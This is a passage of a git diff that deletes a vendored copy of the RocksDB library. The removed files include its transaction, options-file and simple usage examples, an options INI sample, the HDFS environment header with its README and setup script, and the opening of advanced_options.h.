-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(value == "def");
-
-  // Attempt to commit transaction
-  s = txn->Commit();
-
-  // Transaction could not commit since the write outside of the txn conflicted
-  // with the read!
-  assert(s.IsBusy());
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  read_options.snapshot = db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Commit.  Since the snapshot was advanced, the write done outside of the
-  // transaction does not prevent this transaction from Committing.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/examples/options_file_example.cc b/thirdparty/rocksdb/examples/options_file_example.cc
deleted file mode 100644
index 5dd0a47..0000000
--- a/thirdparty/rocksdb/examples/options_file_example.cc
+++ /dev/null
@@ -1,113 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file demonstrates how to use the utility functions defined in
-// rocksdb/utilities/options_util.h to open a rocksdb database without
-// remembering all the rocksdb options.
-#include <cstdio>
-#include <string>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/options_util.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_options_file_example";
-
-namespace {
-// A dummy compaction filter
-class DummyCompactionFilter : public CompactionFilter {
- public:
-  virtual ~DummyCompactionFilter() {}
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value, bool* value_changed) const {
-    return false;
-  }
-  virtual const char* Name() const { return "DummyCompactionFilter"; }
-};
-
-}  // namespace
-
-int main() {
-  DBOptions db_opt;
-  db_opt.create_if_missing = true;
-
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  cf_descs.push_back({kDefaultColumnFamilyName, ColumnFamilyOptions()});
-  cf_descs.push_back({"new_cf", ColumnFamilyOptions()});
-
-  // initialize BlockBasedTableOptions
-  auto cache = NewLRUCache(1 * 1024 * 1024 * 1024);
-  BlockBasedTableOptions bbt_opts;
-  bbt_opts.block_size = 32 * 1024;
-  bbt_opts.block_cache = cache;
-
-  // initialize column families options
-  std::unique_ptr<CompactionFilter> compaction_filter;
-  compaction_filter.reset(new DummyCompactionFilter());
-  cf_descs[0].options.table_factory.reset(NewBlockBasedTableFactory(bbt_opts));
-  cf_descs[0].options.compaction_filter = compaction_filter.get();
-  cf_descs[1].options.table_factory.reset(NewBlockBasedTableFactory(bbt_opts));
-
-  // destroy and open DB
-  DB* db;
-  Status s = DestroyDB(kDBPath, Options(db_opt, cf_descs[0].options));
-  assert(s.ok());
-  s = DB::Open(Options(db_opt, cf_descs[0].options), kDBPath, &db);
-  assert(s.ok());
-
-  // Create column family, and rocksdb will persist the options.
-  ColumnFamilyHandle* cf;
-  s = db->CreateColumnFamily(ColumnFamilyOptions(), "new_cf", &cf);
-  assert(s.ok());
-
-  // close DB
-  delete cf;
-  delete db;
-
-  // In the following code, we will reopen the rocksdb instance using
-  // the options file stored in the db directory.
-
-  // Load the options file.
-  DBOptions loaded_db_opt;
-  std::vector<ColumnFamilyDescriptor> loaded_cf_descs;
-  s = LoadLatestOptions(kDBPath, Env::Default(), &loaded_db_opt,
-                        &loaded_cf_descs);
-  assert(s.ok());
-  assert(loaded_db_opt.create_if_missing == db_opt.create_if_missing);
-
-  // Initialize pointer options for each column family
-  for (size_t i = 0; i < loaded_cf_descs.size(); ++i) {
-    auto* loaded_bbt_opt = reinterpret_cast<BlockBasedTableOptions*>(
-        loaded_cf_descs[0].options.table_factory->GetOptions());
-    // Expect the same as BlockBasedTableOptions will be loaded form file.
-    assert(loaded_bbt_opt->block_size == bbt_opts.block_size);
-    // However, block_cache needs to be manually initialized as documented
-    // in rocksdb/utilities/options_util.h.
-    loaded_bbt_opt->block_cache = cache;
-  }
-  // In addition, as pointer options are initialized with default value,
-  // we need to properly initialized all the pointer options if non-defalut
-  // values are used before calling DB::Open().
-  assert(loaded_cf_descs[0].options.compaction_filter == nullptr);
-  loaded_cf_descs[0].options.compaction_filter = compaction_filter.get();
-
-  // reopen the db using the loaded options.
-  std::vector<ColumnFamilyHandle*> handles;
-  s = DB::Open(loaded_db_opt, kDBPath, loaded_cf_descs, &handles, &db);
-  assert(s.ok());
-
-  // close DB
-  for (auto* handle : handles) {
-    delete handle;
-  }
-  delete db;
-}
diff --git a/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini b/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini
deleted file mode 100644
index 8e07131..0000000
--- a/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini
+++ /dev/null
@@ -1,143 +0,0 @@
-# This is a RocksDB option file.
-#
-# A typical RocksDB options file has four sections, which are
-# Version section, DBOptions section, at least one CFOptions
-# section, and one TableOptions section for each column family.
-# The RocksDB options file in general follows the basic INI
-# file format with the following extensions / modifications:
-#
-#  * Escaped characters
-#    We escaped the following characters:
-#     - \n -- line feed - new line
-#     - \r -- carriage return
-#     - \\ -- backslash \
-#     - \: -- colon symbol :
-#     - \# -- hash tag #
-#  * Comments
-#    We support # style comments.  Comments can appear at the ending
-#    part of a line.
-#  * Statements
-#    A statement is of the form option_name = value.
-#    Each statement contains a '=', where extra white-spaces
-#    are supported. However, we don't support multi-lined statement.
-#    Furthermore, each line can only contain at most one statement.
-#  * Sections
-#    Sections are of the form [SecitonTitle "SectionArgument"],
-#    where section argument is optional.
-#  * List
-#    We use colon-separated string to represent a list.
-#    For instance, n1:n2:n3:n4 is a list containing four values.
-#
-# Below is an example of a RocksDB options file:
-[Version]
-  rocksdb_version=4.3.0
-  options_file_version=1.1
-
-[DBOptions]
-  stats_dump_period_sec=600
-  max_manifest_file_size=18446744073709551615
-  bytes_per_sync=8388608
-  delayed_write_rate=2097152
-  WAL_ttl_seconds=0
-  WAL_size_limit_MB=0
-  max_subcompactions=1
-  wal_dir=
-  wal_bytes_per_sync=0
-  db_write_buffer_size=0
-  keep_log_file_num=1000
-  table_cache_numshardbits=4
-  max_file_opening_threads=1
-  writable_file_max_buffer_size=1048576
-  random_access_max_buffer_size=1048576
-  use_fsync=false
-  max_total_wal_size=0
-  max_open_files=-1
-  skip_stats_update_on_db_open=false
-  max_background_compactions=16
-  manifest_preallocation_size=4194304
-  max_background_flushes=7
-  is_fd_close_on_exec=true
-  max_log_file_size=0
-  advise_random_on_open=true
-  create_missing_column_families=false
-  paranoid_checks=true
-  delete_obsolete_files_period_micros=21600000000
-  log_file_time_to_roll=0
-  compaction_readahead_size=0
-  create_if_missing=false
-  use_adaptive_mutex=false
-  enable_thread_tracking=false
-  allow_fallocate=true
-  error_if_exists=false
-  recycle_log_file_num=0
-  skip_log_error_on_recovery=false
-  db_log_dir=
-  new_table_reader_for_compaction_inputs=true
-  allow_mmap_reads=false
-  allow_mmap_writes=false
-  use_direct_reads=false
-  use_direct_writes=false
-
-
-[CFOptions "default"]
-  compaction_style=kCompactionStyleLevel
-  compaction_filter=nullptr
-  num_levels=6
-  table_factory=BlockBasedTable
-  comparator=leveldb.BytewiseComparator
-  max_sequential_skip_in_iterations=8
-  soft_rate_limit=0.000000
-  max_bytes_for_level_base=1073741824
-  memtable_prefix_bloom_probes=6
-  memtable_prefix_bloom_bits=0
-  memtable_prefix_bloom_huge_page_tlb_size=0
-  max_successive_merges=0
-  arena_block_size=16777216
-  min_write_buffer_number_to_merge=1
-  target_file_size_multiplier=1
-  source_compaction_factor=1
-  max_bytes_for_level_multiplier=8
-  max_bytes_for_level_multiplier_additional=2:3:5
-  compaction_filter_factory=nullptr
-  max_write_buffer_number=8
-  level0_stop_writes_trigger=20
-  compression=kSnappyCompression
-  level0_file_num_compaction_trigger=4
-  purge_redundant_kvs_while_flush=true
-  max_write_buffer_number_to_maintain=0
-  memtable_factory=SkipListFactory
-  max_grandparent_overlap_factor=8
-  expanded_compaction_factor=25
-  hard_pending_compaction_bytes_limit=137438953472
-  inplace_update_num_locks=10000
-  level_compaction_dynamic_level_bytes=true
-  level0_slowdown_writes_trigger=12
-  filter_deletes=false
-  verify_checksums_in_compaction=true
-  min_partial_merge_operands=2
-  paranoid_file_checks=false
-  target_file_size_base=134217728
-  optimize_filters_for_hits=false
-  merge_operator=PutOperator
-  compression_per_level=kNoCompression:kNoCompression:kNoCompression:kSnappyCompression:kSnappyCompression:kSnappyCompression
-  compaction_measure_io_stats=false
-  prefix_extractor=nullptr
-  bloom_locality=0
-  write_buffer_size=134217728
-  disable_auto_compactions=false
-  inplace_update_support=false
-
-[TableOptions/BlockBasedTable "default"]
-  format_version=2
-  whole_key_filtering=true
-  no_block_cache=false
-  checksum=kCRC32c
-  filter_policy=rocksdb.BuiltinBloomFilter
-  block_size_deviation=10
-  block_size=8192
-  block_restart_interval=16
-  cache_index_and_filter_blocks=false
-  pin_l0_filter_and_index_blocks_in_cache=false
-  index_type=kBinarySearch
-  hash_index_allow_collision=true
-  flush_block_policy_factory=FlushBlockBySizePolicyFactory
diff --git a/thirdparty/rocksdb/examples/simple_example.cc b/thirdparty/rocksdb/examples/simple_example.cc
deleted file mode 100644
index a8f80f0..0000000
--- a/thirdparty/rocksdb/examples/simple_example.cc
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstdio>
-#include <string>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_simple_example";
-
-int main() {
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  {
-    PinnableSlice pinnable_val;
-    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-    assert(pinnable_val == "value");
-  }
-
-  {
-    std::string string_val;
-    // If it cannot pin the value, it copies the value to its internal buffer.
-    // The intenral buffer could be set during construction.
-    PinnableSlice pinnable_val(&string_val);
-    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-    assert(pinnable_val == "value");
-    // If the value is not pinned, the internal buffer must have the value.
-    assert(pinnable_val.IsPinned() || string_val == "value");
-  }
-
-  PinnableSlice pinnable_val;
-  db->Get(ReadOptions(), db->DefaultColumnFamily(), "key1", &pinnable_val);
-  assert(s.IsNotFound());
-  // Reset PinnableSlice after each use and before each reuse
-  pinnable_val.Reset();
-  db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-  assert(pinnable_val == "value");
-  pinnable_val.Reset();
-  // The Slice pointed by pinnable_val is not valid after this point
-
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/transaction_example.cc b/thirdparty/rocksdb/examples/transaction_example.cc
deleted file mode 100644
index 7274cf7..0000000
--- a/thirdparty/rocksdb/examples/transaction_example.cc
+++ /dev/null
@@ -1,144 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_transaction_example";
-
-int main() {
-  // open DB
-  Options options;
-  TransactionDBOptions txn_db_options;
-  options.create_if_missing = true;
-  TransactionDB* txn_db;
-
-  Status s = TransactionDB::Open(options, txn_db_options, kDBPath, &txn_db);
-  assert(s.ok());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple Transaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  s = txn->Put("abc", "def");
-  assert(s.ok());
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = txn_db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = txn_db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  s = txn_db->Put(write_options, "abc", "xyz");
-  assert(s.ok());
-
-  // Attempt to read a key using the snapshot.  This will fail since
-  // the previous write outside this txn conflicts with this read.
-  read_options.snapshot = snapshot;
-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(s.IsBusy());
-
-  txn->Rollback();
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = txn_db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = txn_db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  txn->SetSavePoint();
-  read_options.snapshot = txn_db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  // Since the snapshot was advanced, the write done outside of the
-  // transaction does not conflict.
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Decide we want to revert the last write from this transaction.
-  txn->RollbackToSavePoint();
-
-  // Commit.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/hdfs/README b/thirdparty/rocksdb/hdfs/README
deleted file mode 100644
index 9036511..0000000
--- a/thirdparty/rocksdb/hdfs/README
+++ /dev/null
@@ -1,23 +0,0 @@
-This directory contains the hdfs extensions needed to make rocksdb store
-files in HDFS.
-
-It has been compiled and testing against CDH 4.4 (2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0).
-
-The configuration assumes that packages libhdfs0, libhdfs0-dev are 
-installed which basically means that hdfs.h is in /usr/include and libhdfs in /usr/lib
-
-The env_hdfs.h file defines the rocksdb objects that are needed to talk to an
-underlying filesystem. 
-
-If you want to compile rocksdb with hdfs support, please set the following
-environment variables appropriately (also defined in setup.sh for convenience)
-   USE_HDFS=1
-   JAVA_HOME=/usr/local/jdk-7u79-64
-   LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/jdk-7u79-64/jre/lib/amd64/server:/usr/local/jdk-7u79-64/jre/lib/amd64/:./snappy/libs
-   make clean all db_bench
-
-To run dbbench,
-  set CLASSPATH to include your hadoop distribution
-  db_bench --hdfs="hdfs://hbaseudbperf001.snc1.facebook.com:9000"
-
-
diff --git a/thirdparty/rocksdb/hdfs/env_hdfs.h b/thirdparty/rocksdb/hdfs/env_hdfs.h
deleted file mode 100644
index 3a62bc8..0000000
--- a/thirdparty/rocksdb/hdfs/env_hdfs.h
+++ /dev/null
@@ -1,374 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-#include <algorithm>
-#include <stdio.h>
-#include <time.h>
-#include <iostream>
-#include "port/sys_time.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-#ifdef USE_HDFS
-#include <hdfs.h>
-
-namespace rocksdb {
-
-// Thrown during execution when there is an issue with the supplied
-// arguments.
-class HdfsUsageException : public std::exception { };
-
-// A simple exception that indicates something went wrong that is not
-// recoverable.  The intention is for the message to be printed (with
-// nothing else) and the process terminate.
-class HdfsFatalException : public std::exception {
-public:
-  explicit HdfsFatalException(const std::string& s) : what_(s) { }
-  virtual ~HdfsFatalException() throw() { }
-  virtual const char* what() const throw() {
-    return what_.c_str();
-  }
-private:
-  const std::string what_;
-};
-
-//
-// The HDFS environment for rocksdb. This class overrides all the
-// file/dir access methods and delegates the thread-mgmt methods to the
-// default posix environment.
-//
-class HdfsEnv : public Env {
-
- public:
-  explicit HdfsEnv(const std::string& fsname) : fsname_(fsname) {
-    posixEnv = Env::Default();
-    fileSys_ = connectToPath(fsname_);
-  }
-
-  virtual ~HdfsEnv() {
-    fprintf(stderr, "Destroying HdfsEnv::Default()\n");
-    hdfsDisconnect(fileSys_);
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options);
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     std::unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options);
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 std::unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options);
-
-  virtual Status NewDirectory(const std::string& name,
-                              std::unique_ptr<Directory>* result);
-
-  virtual Status FileExists(const std::string& fname);
-
-  virtual Status GetChildren(const std::string& path,
-                             std::vector<std::string>* result);
-
-  virtual Status DeleteFile(const std::string& fname);
-
-  virtual Status CreateDir(const std::string& name);
-
-  virtual Status CreateDirIfMissing(const std::string& name);
-
-  virtual Status DeleteDir(const std::string& name);
-
-  virtual Status GetFileSize(const std::string& fname, uint64_t* size);
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime);
-
-  virtual Status RenameFile(const std::string& src, const std::string& target);
-
-  virtual Status LinkFile(const std::string& src, const std::string& target) {
-    return Status::NotSupported(); // not supported
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock);
-
-  virtual Status UnlockFile(FileLock* lock);
-
-  virtual Status NewLogger(const std::string& fname,
-                           std::shared_ptr<Logger>* result);
-
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr, void (*unschedFunction)(void* arg) = 0) {
-    posixEnv->Schedule(function, arg, pri, tag, unschedFunction);
-  }
-
-  virtual int UnSchedule(void* tag, Priority pri) {
-    return posixEnv->UnSchedule(tag, pri);
-  }
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) {
-    posixEnv->StartThread(function, arg);
-  }
-
-  virtual void WaitForJoin() { posixEnv->WaitForJoin(); }
-
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const
-      override {
-    return posixEnv->GetThreadPoolQueueLen(pri);
-  }
-
-  virtual Status GetTestDirectory(std::string* path) {
-    return posixEnv->GetTestDirectory(path);
-  }
-
-  virtual uint64_t NowMicros() {
-    return posixEnv->NowMicros();
-  }
-
-  virtual void SleepForMicroseconds(int micros) {
-    posixEnv->SleepForMicroseconds(micros);
-  }
-
-  virtual Status GetHostName(char* name, uint64_t len) {
-    return posixEnv->GetHostName(name, len);
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) {
-    return posixEnv->GetCurrentTime(unix_time);
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-      std::string* output_path) {
-    return posixEnv->GetAbsolutePath(db_path, output_path);
-  }
-
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) {
-    posixEnv->SetBackgroundThreads(number, pri);
-  }
-
-  virtual int GetBackgroundThreads(Priority pri = LOW) {
-    return posixEnv->GetBackgroundThreads(pri);
-  }
-
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override {
-    posixEnv->IncBackgroundThreadsIfNeeded(number, pri);
-  }
-
-  virtual std::string TimeToString(uint64_t number) {
-    return posixEnv->TimeToString(number);
-  }
-
-  static uint64_t gettid() {
-    assert(sizeof(pthread_t) <= sizeof(uint64_t));
-    return (uint64_t)pthread_self();
-  }
-
-  virtual uint64_t GetThreadID() const override {
-    return HdfsEnv::gettid();
-  }
-
- private:
-  std::string fsname_;  // string of the form "hdfs://hostname:port/"
-  hdfsFS fileSys_;      //  a single FileSystem object for all files
-  Env*  posixEnv;       // This object is derived from Env, but not from
-                        // posixEnv. We have posixnv as an encapsulated
-                        // object here so that we can use posix timers,
-                        // posix threads, etc.
-
-  static const std::string kProto;
-  static const std::string pathsep;
-
-  /**
-   * If the URI is specified of the form hdfs://server:port/path,
-   * then connect to the specified cluster
-   * else connect to default.
-   */
-  hdfsFS connectToPath(const std::string& uri) {
-    if (uri.empty()) {
-      return nullptr;
-    }
-    if (uri.find(kProto) != 0) {
-      // uri doesn't start with hdfs:// -> use default:0, which is special
-      // to libhdfs.
-      return hdfsConnectNewInstance("default", 0);
-    }
-    const std::string hostport = uri.substr(kProto.length());
-
-    std::vector <std::string> parts;
-    split(hostport, ':', parts);
-    if (parts.size() != 2) {
-      throw HdfsFatalException("Bad uri for hdfs " + uri);
-    }
-    // parts[0] = hosts, parts[1] = port/xxx/yyy
-    std::string host(parts[0]);
-    std::string remaining(parts[1]);
-
-    int rem = remaining.find(pathsep);
-    std::string portStr = (rem == 0 ? remaining :
-                           remaining.substr(0, rem));
-
-    tPort port;
-    port = atoi(portStr.c_str());
-    if (port == 0) {
-      throw HdfsFatalException("Bad host-port for hdfs " + uri);
-    }
-    hdfsFS fs = hdfsConnectNewInstance(host.c_str(), port);
-    return fs;
-  }
-
-  void split(const std::string &s, char delim,
-             std::vector<std::string> &elems) {
-    elems.clear();
-    size_t prev = 0;
-    size_t pos = s.find(delim);
-    while (pos != std::string::npos) {
-      elems.push_back(s.substr(prev, pos));
-      prev = pos + 1;
-      pos = s.find(delim, prev);
-    }
-    elems.push_back(s.substr(prev, s.size()));
-  }
-};
-
-}  // namespace rocksdb
-
-#else // USE_HDFS
-
-
-namespace rocksdb {
-
-static const Status notsup;
-
-class HdfsEnv : public Env {
-
- public:
-  explicit HdfsEnv(const std::string& fsname) {
-    fprintf(stderr, "You have not build rocksdb with HDFS support\n");
-    fprintf(stderr, "Please see hdfs/README for details\n");
-    abort();
-  }
-
-  virtual ~HdfsEnv() {
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override;
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    return notsup;
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    return notsup;
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    return notsup;
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    return notsup;
-  }
-
-  virtual Status GetChildren(const std::string& path,
-                             std::vector<std::string>* result) override {
-    return notsup;
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    return notsup;
-  }
-
-  virtual Status CreateDir(const std::string& name) override { return notsup; }
-
-  virtual Status CreateDirIfMissing(const std::string& name) override {
-    return notsup;
-  }
-
-  virtual Status DeleteDir(const std::string& name) override { return notsup; }
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* size) override {
-    return notsup;
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* time) override {
-    return notsup;
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override {
-    return notsup;
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override {
-    return notsup;
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    return notsup;
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override { return notsup; }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    return notsup;
-  }
-
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) override {}
-
-  virtual int UnSchedule(void* tag, Priority pri) override { return 0; }
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) override {}
-
-  virtual void WaitForJoin() override {}
-
-  virtual unsigned int GetThreadPoolQueueLen(
-      Priority pri = LOW) const override {
-    return 0;
-  }
-
-  virtual Status GetTestDirectory(std::string* path) override { return notsup; }
-
-  virtual uint64_t NowMicros() override { return 0; }
-
-  virtual void SleepForMicroseconds(int micros) override {}
-
-  virtual Status GetHostName(char* name, uint64_t len) override {
-    return notsup;
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* outputpath) override {
-    return notsup;
-  }
-
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {}
-  virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; }
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override {
-  }
-  virtual std::string TimeToString(uint64_t number) override { return ""; }
-
-  virtual uint64_t GetThreadID() const override {
-    return 0;
-  }
-};
-}
-
-#endif // USE_HDFS
diff --git a/thirdparty/rocksdb/hdfs/setup.sh b/thirdparty/rocksdb/hdfs/setup.sh
deleted file mode 100644
index ac69b52..0000000
--- a/thirdparty/rocksdb/hdfs/setup.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-export USE_HDFS=1
-export LD_LIBRARY_PATH=$JAVA_HOME/jre/lib/amd64/server:$JAVA_HOME/jre/lib/amd64:/usr/lib/hadoop/lib/native
-
-export CLASSPATH=
-for f in `find /usr/lib/hadoop-hdfs | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
-for f in `find /usr/lib/hadoop | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
-for f in `find /usr/lib/hadoop/client | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
diff --git a/thirdparty/rocksdb/include/rocksdb/advanced_options.h b/thirdparty/rocksdb/include/rocksdb/advanced_options.h
deleted file mode 100644
index 6f45134..0000000
--- a/thirdparty/rocksdb/include/rocksdb/advanced_options.h
+++ /dev/null
@@ -1,578 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/universal_compaction.h"
-
